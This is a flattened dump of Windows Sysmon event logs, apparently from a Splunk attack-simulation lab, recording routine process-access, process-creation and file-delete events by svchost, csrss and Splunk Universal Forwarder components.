07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.453{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F317-60EB-4779-00000000D001}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.453{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F317-60EB-4779-00000000D001}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.454{0C1E0330-F317-60EB-4779-00000000D001}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.844{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A51A2C55BDE9D850C8A0AA9019E7B1D,SHA256=B3D9535AD7AFA73281224170E6851B3CFDB1D645526B9F1443876C4FD52A464D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:28.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E65AEEB4EFB56FB1B931BCAE2021DC06,SHA256=8F7D97212ED5738ABE139F9D5DDA1727560026EFB8C73B84FC756568DCF883AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.281{0C1E0330-F318-60EB-4879-00000000D001}39962064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F318-60EB-4879-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F318-60EB-4879-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.141{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F318-60EB-4879-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.141{0C1E0330-F318-60EB-4879-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:29.875{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F5BB7FBFB77472C085ADA4C1E5C4696,SHA256=9F075BA133861FFBF38FA4B69545623826652D2E25F06D2BAB2DA788F63E6A5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 